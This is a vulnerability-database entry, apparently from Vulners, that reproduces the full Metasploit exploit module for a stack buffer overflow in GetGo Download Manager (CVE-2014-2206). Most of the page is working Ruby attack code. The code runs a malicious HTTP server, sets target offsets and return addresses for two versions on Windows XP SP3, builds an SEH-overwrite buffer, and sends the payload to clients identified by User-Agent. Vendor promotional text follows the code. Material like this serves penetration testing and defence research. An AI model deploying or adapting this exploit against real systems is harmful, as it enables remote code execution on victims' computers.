Lucene search
K

GetGo Download Manager HTTP Response Buffer Overflow

🗓️ 14 Jan 2015 21:04:30Reported by Julien Ahrens, Gabor Seljan, bzyo, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 33 Views

GetGo Download Manager HTTP Response Buffer Overflow, allows remote attacker to execute arbitrary code through overly long HTTP response header.

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GetGo Download Manager HTTP Response Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability in
        GetGo Download Manager version 5.3.0.2712 earlier, caused by an
        overly long HTTP response header.

        By persuading the victim to download a file from a malicious server, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash. This module has been tested successfully on
        Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Julien Ahrens',  # Vulnerability discovery
          'Gabor Seljan',   # Metasploit module for v4
          'bzyo',           # Metasploit module for v5
          'sinn3r'          # Helping Gabor and bzyo (see #4588 & #9642)
        ],
      'References'     =>
        [
          [ 'EDB', '32132' ],
          [ 'OSVDB', '103910' ],
          [ 'CVE', '2014-2206' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'URIPATH'      => "/shakeitoff.mp3"
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          # v5 has no bad chars
          'BadChars'   => "\x00\x0a\x0d"
        },
      'Targets'        =>
        [
          [
            'Automatic', {}
          ],
          [ '4.9.0.1982 on Windows XP SP3',
            {
              'Offset' => 4107,
              'Ret'    => 0x00280b0b  # CALL DWORD PTR SS:[EBP+30]
            }
          ],
          [
            '5.3.0.2712 on Windows XP SP3',
            {
              'Offset'  => 4095,
              # 0:016> u 0x72d11f39
              # msacm32!wodMessage+0xd0f:
              # 72d11f39 5f              pop     edi
              # 72d11f3a 5e              pop     esi
              # 72d11f3b c20400          ret     4
              'Ret'     => 0x72d11f39,
              # 12253 is the same size the python PoC used
              'MaxSize' => 12253
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2014-03-09',
      'DefaultTarget'  => 0))
  end

  # This part is from Gabor Seljan
  def exploit_v4(cli, current_taget)
    sploit  = rand_text_alpha(current_taget['Offset'])
    sploit << "\x90\x90\xEB\x06"
    sploit << [current_taget.ret].pack('V')
    sploit << payload.encoded

    print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")

    resp = create_response(200, sploit)
    resp.body = ""
    cli.send_response(resp)
  end

  # This part is from Auxilus with some help from @_sinn3r
  def exploit_v5(cli, current_taget)
    seh_record = generate_seh_record(current_taget.ret)
    # Minus 4 for the SEH record
    buffer = Rex::Text.rand_text_alpha(current_taget['Offset'] - 4)
    buffer << seh_record
    buffer << payload.encoded
    buffer << Rex::Text.rand_text_alpha(current_taget['MaxSize'] - buffer.length)
    res = create_response(200, buffer)
    cli.send_response(res)
  end

  def on_request_uri(cli, request)
    print_status("#{cli.peerhost} connected")
    current_target = target
    user_agent = request.headers['User-Agent'].to_s

    if current_target == targets[1] || user_agent.match(/GetGo Download Manager 4\.0/)
      print_status('Attempting to exploit against v4')
      current_target = targets[1]
      exploit_v4(cli, current_target)
    elsif current_target == targets[2] || user_agent.match(/GetGo Download Manager 5\.0/)
      print_status('Attempting to exploit against v5')
      current_target = targets[2]
      exploit_v5(cli, current_target)
    else
      print_error('Sending 404 for unknown user-agent')
      send_not_found(cli)
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
1.1Low risk
Vulners AI Score1.1
CVSS 210
EPSS0.6144
33